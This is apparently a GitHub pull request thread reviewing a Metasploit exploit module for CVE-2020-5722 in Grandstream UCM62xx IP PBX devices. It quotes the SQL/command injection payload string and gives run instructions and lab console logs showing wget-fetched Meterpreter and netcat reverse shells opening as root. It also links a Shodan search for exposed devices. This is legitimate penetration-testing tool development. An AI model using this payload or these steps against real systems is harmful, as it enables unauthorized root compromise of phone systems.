Exploit Module for Grandstream UCM62xx IP PBX (CVE-2020-5722)
rapid7/metasploit-framework pull request #16056
Opened 2022-01-15 21:10 UTC by jbaines-r7

# Description

This module is probably a couple years behind it's heyday but there a number of the PBX that are still internet facing (see [Shodan](https://www.shodan.io/search?query=ssl%3A%22Grandstream%22+%22Set-Cookie%3A+TRACKID%22+-%22title%3ALoading%22+-%22title%3ADevice%22)), with a respectable number of them still using affected firmware (so I'm sure internal-only PBX are a relative nightmare). While I doubt it's still being used by [DDoS botnet's](https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/), [Greynoise](https://www.greynoise.io/viz/query/?gnql=tags%3A%22Grandstream%20UCM62XX%20RCE%22) is still tracking *one* malicious instance of this being thrown on the internet. And of course, [X-Force](https://www.ibm.com/downloads/cas/M1X3B7QG) called this the 10th most exploited vulnerability in 2020, so this pull request *can't* _just_ be self-indulgent module development. Right?

This module exploits unauthenticated SQL and command injection vulnerabilities affecting the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an unauthenticated and remote attacker to execute commands as root. This module affects UCM62xx versions before firmware version 1.0.19.20.

# Verification

- [ ] Acquire an affected device and configure with affected firmware
- [ ] Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
- [ ] Do: `set RHOST <ip>`
- [ ] Do: `check`
- [ ]  Verify the remote target is flagged as vulnerable
- [ ]  Do: `set LHOST <ip>`
- [ ]  Do: `set LPORT <port>`
- [ ]  Do: `exploit`
- [ ]  You should get a Meterpreter session.

# PCAP || GTFO

The PBX is typically set up to listen with SSL on port 8089. But, for capturing pcaps, I disabled SSL and switched to port 8080. I caught both meterpreter and normal `/bin/sh` reverse shells.

[pbx_pcap.zip](https://github.com/rapid7/metasploit-framework/files/7875891/pbx_pcap.zip)

# Video || GTFO

https://www.youtube.com/watch?v=-eA_1SQFl2U

2022-01-17 19:35 UTC, wvu-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +        'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
Randomize `z`?

2022-01-17 19:35 UTC, wvu-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +        'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
And `1=1`?

2022-01-19 18:48 UTC, gwillcox-r7 requested changes
Overall looks good but a few concerns on explanations that are a little unclear and some randomization points that Will pointed out before this can be landed.

2022-01-19 18:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +unauthenticated and remote attacker to execute commands as root. This module affects
```suggestion
unauthenticated and remote attacker to execute commands as `root`. This module affects
```

2022-01-19 18:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +unauthenticated and remote attacker to execute commands as root. This module affects
Do we not have CVE ID's for these vulnerabilities? Also is there any way to explain how these vulnerabilities tie together a bit more? It seems like this description as it stands glosses over a lot of important details in an effort to try make things short, but the result is that I'm really not sure what this module is meant to be exploiting and in what order to get its results from this description.

2022-01-19 18:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
```suggestion
The UCM62xx PBX is a physical device and is not known to have been successfully emulated by any software.
```

Fixed a typo and made a suggestion on improving the English here.

2022-01-19 18:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +* Acquire an affected device and configure with affected firmware
```suggestion
* Acquire an affected device and configure it with the affected firmware
```

2022-01-19 18:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +By default, this target obtains a meterpreter session using `wget`.
Why the `by default` part here? What is the other case that may occur? If there is one, it should be explained here. If not, then we shouldn't be using the `by default` wording here and should just state what it does.

2022-01-19 18:48 UTC, gwillcox-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +          UCM62xx versions before firmware version 1.0.19.20.
See above comment about how this is chained together. Think this description could explain the connection between these vulns and the affected pages + parameters a bit more.

2022-01-19 18:48 UTC, gwillcox-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
```suggestion
      return CheckCode::Appears('This determination is based on the version string returned from /cgi.')
    end

    return CheckCode::Safe('This determination is based on the version string returned from /cgi.')
```

Suggestion for making this a little bit clearer to the end user where you got this information from, otherwise your saying you got a version string from somewhere, but the user won't know where you got it from.

2022-01-20 07:14 UTC, bcoles commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
> Suggestion for making this a little bit clearer to the end user where you got this information from, otherwise your saying you got a version string from somewhere, but the user won't know where you got it from.

No-one cares where the version came from, but printing the version may be useful.

2022-01-20 11:22 UTC, jbaines-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
For what it's worth, the version is printed on line 116.

2022-01-20 11:24 UTC, jbaines-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
I'd also point out that line 98 specifically says where the version is being requested 🤷

2022-01-20 11:27 UTC, bcoles commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
> For what it's worth, the version is printed on line 116.

It does, but it uses `print_status` which is forbidden in a `check` method. The module can return the version in the CeckCode description instead.

2022-01-20 11:31 UTC, jbaines-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
Oh interesting, I didn't realize that print_status wan't allowed in `check`. I guess [https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method](documentation) indicates it's discouraged, but I'd be lying if I said I'd read that 😬 

Noted. Thanks @bcoles!

2022-01-20 14:48 UTC, smcintyre-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
This is missing the firmware versions.

2022-01-20 14:48 UTC, smcintyre-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
Pretty sure this would be selected as the framework wide default option in this case.

2022-01-22 21:17 UTC, jbaines-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
Anyone reading this: I requested @smcintyre-r7 leave a comment that I misspelled "firmware". The version is included.

2022-01-22 21:53 UTC, jbaines-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +        'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
I don't actually agree there is any value in randomization of 1=1. Any generic network signature for sql injection will catch this no matter the randomization. Furthermore, the follow-on `cmd` is a shell command which would be far better to write a signature for anyways.

Regardless, as per your request, I randomized the 1=1. I removed the `z` and set to the an empty string.

2022-01-22 21:54 UTC, jbaines-r7 commented on modules/exploits/linux/http/grandstream_ucm62xx_sendemail_rce.rb
> +    return CheckCode::Safe('This determination is based on the version string.')
Fixed `print_status` x2 and added the version to the `CheckCode` return.

2022-01-22 22:08 UTC, jbaines-r7 commented on documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md
> +unauthenticated and remote attacker to execute commands as root. This module affects
Let me know if the update doesn't satisfy.

2022-01-22 22:17 UTC, jbaines-r7 commented
Addressed all open comments. Retested.

```
sf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce
[*] No payload configured, defaulting to linux/armle/meterpreter/reverse_tcp
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set RHOST 10.0.0.9
RHOST => 10.0.0.9
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. This determination is based on the version string: 1.0.18.13.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hb0X2jvlq
[*] Local IP: http://10.0.0.3:8080/hb0X2jvlq
[*] Client 10.0.0.9 (Wget/1.10.1) requested /hb0X2jvlq
[*] Sending payload to 10.0.0.9 (Wget/1.10.1)
[*] Sending stage (903400 bytes) to 10.0.0.9
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.9:51105 ) at 2022-01-22 14:16:08 -0800
[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.

meterpreter > shell
Process 21944 created.
Channel 1 created.
uname -a
Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
```

2022-01-24 12:16 UTC, jbaines-r7 commented
Realized I wasn't using `fail_with` exits on payload failure (which honestly shouldn't be reached when `check` is enforced). Fixed and retested:

```
sf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. This determination is based on the version string: 1.0.18.13.
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[+] Exploit successfully executed.
[*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.7:55735 ) at 2022-01-24 03:56:55 -0800

whoami
root
exit
```
```
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. This determination is based on the version string: 1.0.20.20. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. This determination is based on the version string: 1.0.20.20. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[-] Exploit aborted due to failure: unexpected-reply: The server responded with an error status -50
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/grandstream_ucm62xx_sendemail_rce) > 

```

2022-01-25 02:14 UTC, gwillcox-r7 approved these changes

2022-01-25 03:05 UTC, merged

2022-01-25 03:06 UTC, gwillcox-r7 commented
Did a minor fix and slight improvement on the wording at https://github.com/rapid7/metasploit-framework/commit/15751a0f78ff7c90a5927ab0f9393a63550ec7e6 to make this a little bit clearer to end users, didn't want to adjust your wording too much though so kept it mostly as is.

2022-01-25 03:08 UTC, gwillcox-r7 commented
# Release Notes
A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to `root` level code execution.